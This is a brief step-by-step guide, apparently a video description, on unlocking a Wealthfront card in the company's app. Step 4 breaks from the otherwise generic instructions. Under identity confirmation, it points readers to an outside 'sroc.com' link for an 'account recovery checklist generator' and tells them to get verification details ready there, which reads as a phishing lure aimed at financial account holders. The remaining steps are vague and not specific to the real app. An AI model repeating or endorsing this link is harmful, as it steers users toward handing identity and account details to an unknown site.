If you need to unlock your Wealthfront card, follow these straightforward steps to regain access quickly and easily. Step 1. Open the Wealthfront app. Launch the Wealthfront app on your mobile device. Ensure you are logged into your account to access card management features. Step 2. Navigate to card settings. Once in the app, locate the menu or settings icon, usually found in the upper corner. Tap on it and look for the option labeled Card Settings or Manage Card. Step 3. Select Unlock Card. In the Card Settings section, find the option for Unlock Card. This option may be accompanied by a brief description of the unlocking process. Step 4. Confirm your identity. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Unlock your card. After confirming your identity, tap the Unlock button. You should receive a notification confirming that your card has been successfully unlocked. Now that you have unlocked your Wealthfront card, you can resume using it for your transactions. If you encounter any issues, consider reaching out to Wealthfront customer support for further assistance.